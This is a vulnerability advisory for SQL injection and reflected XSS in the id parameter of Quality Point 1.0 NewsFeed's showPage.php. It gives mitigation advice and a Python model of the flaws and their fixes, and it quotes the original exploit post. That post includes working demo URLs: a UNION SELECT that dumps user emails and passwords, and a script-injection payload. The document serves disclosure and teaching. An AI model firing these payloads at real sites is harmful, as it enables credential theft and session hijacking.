vendor: Quality Point 1.0
by: Red-D3v1L
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection), 79 (XSS)
Product Name: Quality Point 1.0
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:qualitypointtech:quality_point_1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities

The NewsFeed component of Quality Point 1.0 places the `id` parameter of showPage.php directly into a database query without validating or escaping it, so a remote attacker can inject arbitrary SQL by requesting a crafted URL. The demo below negates the record id so the legitimate query matches nothing, then appends a UNION SELECT with a matching column count to return e-mail addresses, the password column and the database version from the users table in the page body. The same parameter is also reflected into the page without HTML encoding, giving a reflected cross-site scripting vector: a victim who follows a crafted link executes attacker-supplied script in the context of the site, exposing whatever that browser session can reach.

Mitigation:

Treat `id` as an integer and reject anything else before it reaches the database, and pass it through a parameterized (prepared) query instead of string concatenation. HTML-encode the value wherever it is reflected into the response. The application should also be tested for these classes of flaw regularly, since no vendor patch exists.
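To make the two flaws and their fixes concrete, the following is an added example (not code from Quality Point or from the advisory's author) that models showPage.php in Python against an in-memory SQLite database. The schema (a five-column news table, so the advisory's `UNION SELECT 1,...,5` lines up, and a users table with email and password columns) and the attribute context for the reflected value (inferred from the leading `">` in the XSS payload) are assumptions. The advisory's payload is MySQL syntax (`concat`, `0x3e`, `version()`); it is rewritten here with SQLite equivalents so the model runs offline.

```python
"""Model of the showPage.php id-parameter flaws described in the advisory.

Added example, not code from Quality Point or the advisory's author. The
table layout, sample rows and the HTML sink context are assumptions made
so that the advisory's payloads can be exercised offline.
"""
import html
import re
import sqlite3

# Advisory payload translated to SQLite: || for concat(), '>' for 0x3e,
# sqlite_version() for version(). The leading -348 makes the legitimate
# SELECT match nothing so only the UNIONed rows come back; -- drops the rest.
SQLI_PAYLOAD = (
    "-348 UNION SELECT 1, email || '>' || sqlite_version() || '>' || password, "
    "3, 4, 5 FROM users --"
)

# The advisory's XSS payload, URL-decoded.
XSS_PAYLOAD = '"><script>alert(1);</script>'


def build_db() -> sqlite3.Connection:
    """Constructed sample schema and rows standing in for the NewsFeed database."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
        INSERT INTO news VALUES (348, 'Release notes', 'Version 1.0 shipped', 'admin', '2010-01-01');
        CREATE TABLE users (email TEXT, password TEXT);
        INSERT INTO users VALUES ('admin@example.test', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return con


def show_page_vulnerable(con: sqlite3.Connection, page_id: str) -> list:
    """The flaw: the raw id parameter is spliced into the SQL text."""
    sql = f"SELECT id, title, body, author, posted FROM news WHERE id={page_id}"
    return con.execute(sql).fetchall()


def show_page_bound(con: sqlite3.Connection, page_id: str) -> list:
    """Binding alone: the parameter is data, so the payload is compared as a
    string against the integer id column and matches nothing."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=?"
    return con.execute(sql, (page_id,)).fetchall()


def is_valid_id(page_id: str) -> bool:
    """Accept only a short run of decimal digits as a record id."""
    return re.fullmatch(r"[0-9]{1,10}", page_id) is not None


def show_page_fixed(con: sqlite3.Connection, page_id: str) -> list:
    """Hardened handler: reject anything that is not a decimal id, then bind it."""
    if not is_valid_id(page_id):
        raise ValueError("id must be a decimal integer")
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=?"
    return con.execute(sql, (int(page_id),)).fetchall()


def render_vulnerable(page_id: str) -> str:
    """The flaw: id reflected into an attribute value with no encoding."""
    return f'<input type="hidden" name="id" value="{page_id}">'


def render_fixed(page_id: str) -> str:
    """Hardened: HTML-encode the value, quotes included, before reflecting it."""
    return f'<input type="hidden" name="id" value="{html.escape(page_id, quote=True)}">'


if __name__ == "__main__":
    db = build_db()
    print("normal request :", show_page_vulnerable(db, "348"))
    print("injected       :", show_page_vulnerable(db, SQLI_PAYLOAD))
    print("bound only     :", show_page_bound(db, SQLI_PAYLOAD))
    try:
        show_page_fixed(db, SQLI_PAYLOAD)
    except ValueError as err:
        print("fixed          :", err)
    print("xss reflected  :", render_vulnerable(XSS_PAYLOAD))
    print("xss encoded    :", render_fixed(XSS_PAYLOAD))
```

Running it shows the injected request returning a single row whose second column is `email>version>password` instead of a news title, the bound query returning no rows for the same input, and the validated handler refusing it outright; the XSS payload survives the vulnerable renderer intact but comes back as `&quot;&gt;&lt;script&gt;...` from the encoded one.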

Exploit-DB raw data:

sEc-r1z crEw The Leaders for Penetration Testing In Middle East.
+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _         
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_1_0 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
  
    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] For Ask:              [r-d@passport.com]
    [?] Script:               [ Quality Point 1.0 ]
    [?] home Script           [ http://qualitypointtech.net ]
    [?] Language:             [ PHP ]
    [?] Best WishEs :         [ The Love is End ... ]
    [?] Founder:              [ Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# CrEw - Mr.Tro0oqy - r1z - Sas-TerrOrisT And All My Friends ]
########################################################################
    
===[ Exploit SQL ]===
 
    
[»]Exploit :
 
path/showPage.php?id=[SQL injection ]

[>>] Demo : 

http://server/NewsFeed/showPage.php?id=-348+union+select+1,concat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.users%20--

------------
===[ Exploit XSS ]===

[»]Exploit :

showPage.php?id=[XSS]

[>>] Demo : 

http://server/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

-----------------------